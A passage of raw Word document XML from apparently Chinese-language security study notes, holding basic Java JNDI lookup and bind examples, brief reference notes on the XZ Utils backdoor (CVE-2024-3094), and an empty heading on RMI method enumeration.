        <w:t>创建初始上下文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DCA905" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            Context context = new InitialContext();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D0433" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A6FB23" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找名称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"myDataSource"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的资源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD22B0" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            Object myDataSource = context.lookup("myDataSource");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1728A3E4" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D240F50" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用查找到的资源进行后续操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6C2D5B" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            // ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4014C5DD" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F785E6" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭上下文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD8C7DB" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            context.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30780DC7" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } catch (NamingException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B55075" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC3EB8" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525EE4BF" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FD909" w14:textId="1D7A4D4E" w:rsidR="00684CE2" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF8234" w14:textId="77777777" w:rsidR="00684CE2" w:rsidRPr="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0713FABD" w14:textId="2821C31E" w:rsidR="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>绑定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFF084" w14:textId="77777777" w:rsidR="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D99112C" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.Context;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0434A340" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.InitialContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72676EB1" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.NamingException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E6F18" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C8A9B0" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class JNDIBindingExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2280BB" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB15DD4" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6943F6" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建初始上下文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70612C2D" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            Context context = new InitialContext();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8A532" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1649E7" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建要绑定的对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341DFB7C" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            MyService myService = new MyServiceImpl();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D459258" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710C330D" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将对象绑定到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，使用名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"myService"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0F67F0" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            context.bind("myService", myService);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761369E1" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D1DB24" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭上下文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0DE67" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            context.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0E597" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } catch (NamingException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4B955" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66C5CC" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF0DBC" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242F8A5" w14:textId="507EAB0E" w:rsidR="00684CE2" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A307642" w14:textId="77777777" w:rsidR="00684CE2" w:rsidRPr="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7B28CA" w14:textId="58F5264C" w:rsidR="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E041FA" w14:textId="77777777" w:rsidR="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D64BFC9" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.Context;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E4860" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.InitialContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB7A37" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.NamingException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C8D09" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5B7242" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class JNDILookupExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AF53E" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF05E5" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1E8C5" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建初始上下文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507BD1D0" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            Context context = new InitialContext();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D0955" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCBC385" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找名称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"myDataSource"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的资源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17187D4A" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            Object myDataSource = context.lookup("myDataSource");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218B4DA9" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782F14B2" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用查找到的资源进行后续操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139FBBB" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            // ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B1391" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AA8B53" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭上下文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFCD57" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            context.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C654272" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } catch (NamingException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B2DFF6" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046C452" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E66378" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4D5AED" w14:textId="4282B8BA" w:rsidR="00684CE2" w:rsidRPr="00684CE2" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B752434" w14:textId="77777777" w:rsidR="00834C79" w:rsidRDefault="00834C79" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8691EE" w14:textId="6293ECA0" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="00CF7150">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B759B5" w14:textId="77777777" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="00CF7150"/>
    <w:p w14:paraId="1C0903C6" w14:textId="1396D2E1" w:rsidR="00CF7150" w:rsidRDefault="000F5F94" w:rsidP="00CF7150">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00CF7150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（待分析完）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECBE43A" w14:textId="5321EAFF" w:rsidR="00C71905" w:rsidRDefault="00C71905" w:rsidP="00C71905">
      <w:r w:rsidRPr="00C71905">
        <w:t>https://en.wikipedia.org/wiki/XZ_Utils_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353C00F" w14:textId="77777777" w:rsidR="00C71905" w:rsidRPr="00C71905" w:rsidRDefault="00C71905" w:rsidP="00C71905"/>
    <w:p w14:paraId="1500B48C" w14:textId="39394D8B" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="00CF7150">
      <w:r w:rsidRPr="00CF7150">
        <w:t>CVE-2024-3094</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A6E546" w14:textId="19B4986D" w:rsidR="00CF7150" w:rsidRDefault="00D34B96" w:rsidP="00CF7150">
      <w:r w:rsidRPr="00D34B96">
        <w:t>Microsoft employee and PostgreSQL developer Andres Freund</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099554B5" w14:textId="77777777" w:rsidR="00D34B96" w:rsidRDefault="00D34B96" w:rsidP="00CF7150"/>
    <w:p w14:paraId="50E35DF8" w14:textId="77777777" w:rsidR="00D34B96" w:rsidRDefault="00D34B96" w:rsidP="00CF7150"/>
    <w:p w14:paraId="46DA250C" w14:textId="66C76D46" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="00CF7150">
      <w:r w:rsidRPr="00CF7150">
        <w:t>liblzma library in versions 5.6.0 and 5.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68886FD5" w14:textId="448CF1FA" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="00CF7150">
      <w:r w:rsidRPr="00CF7150">
        <w:t>"Jia Tan"[b] in February 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F105114" w14:textId="6C8C33CA" w:rsidR="00CF7150" w:rsidRDefault="00D270E3" w:rsidP="00CF7150">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者分析此漏洞使用到的工具：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D270E3">
        <w:t>https://en.wikipedia.org/wiki/Valgrind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2317D2" w14:textId="77777777" w:rsidR="00CF7150" w:rsidRPr="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="00CF7150"/>
    <w:p w14:paraId="01F646D7" w14:textId="77777777" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEC5092" w14:textId="77777777" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A17EC69" w14:textId="77777777" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AB5B65" w14:textId="77777777" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2C02E4" w14:textId="77777777" w:rsidR="00CF7150" w:rsidRDefault="00CF7150" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE05DD1" w14:textId="5683C515" w:rsidR="00834C79" w:rsidRDefault="00917ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc159779482"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>危险方法枚举探测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="5FEAC167" w14:textId="77777777" w:rsidR="00917ADC" w:rsidRDefault="00917ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B1DA8CE" w14:textId="60ED0909" w:rsidR="00917ADC" w:rsidRDefault="00917ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
